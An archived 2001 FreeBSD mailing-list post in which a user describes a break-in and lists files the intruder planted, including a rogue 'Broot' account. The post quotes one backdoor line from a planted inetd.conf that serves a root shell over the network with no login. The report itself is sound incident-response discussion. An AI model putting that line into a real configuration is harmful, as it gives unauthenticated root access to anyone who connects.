From owner-freebsd-questions Thu Oct 18 13:23: 0 2001 Delivered-To: freebsd-questions@freebsd.org Received: from P7.mpionline.com (dsl-mw-209-115-240-i249-edm.nucleus.com [209.115.240.249]) by hub.freebsd.org (Postfix) with ESMTP id CA4AA37B409 for ; Thu, 18 Oct 2001 13:22:54 -0700 (PDT) Received: from P5 (P5.mpionline.com [209.115.240.246]) by P7.mpionline.com (8.11.3/8.11.3) with SMTP id f9IKOc815186; Thu, 18 Oct 2001 14:24:38 -0600 (MDT) (envelope-from tomek@mpionline.com) Message-ID: <03db01c15812$c4575d40$f6f073d1@mpionline.com> From: "Tomek" To: "Tomek" , References: <20011018131823.Y621-100000@jodie.ncptiddische.net> <011e01c157cf$9b401700$f6f073d1@mpionline.com> <20011018165057.V3734@ns2.wananchi.com> <01e701c157e4$f012abc0$f6f073d1@mpionline.com> <20011018180513.C3734@ns2.wananchi.com> <20011018114805.E70327@acadia.ne.mediaone.net> <018801c157ef$37ec0720$f6f073d1@mpionline.com> Subject: Re: I got hacked, I think Date: Thu, 18 Oct 2001 14:23:36 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.3018.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I found out more info. -rw-r--r-- 1 Broot wheel 54 Sep 26 10:24 /inetd.conf -rw-r--r-- 1 Broot wheel 85857 Sep 26 21:38 /sudo-1.6.3.7_1.tgz -rw------- 1 Broot wheel 4869 Sep 26 10:25 /etc/inetd.conf Checking the bizarre /inetd.conf is shocking: eklogin stream tcp nowait root /bin/sh sh -i I take it that "sh" would not even request a login or anything if called directly from inetd.conf, would it? I am sitting here, he is STILL pinging me and watching the system (even tried to ftp again a few minutes ago), and for the life of me I can't figure out where it all began... who did he even login in the first time, maybe it was some buffer overflow or something.... yuck. TY for all your help guys, you are all wonderful! I will leave you in peace now (I hope). I still dont know about Broot though... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message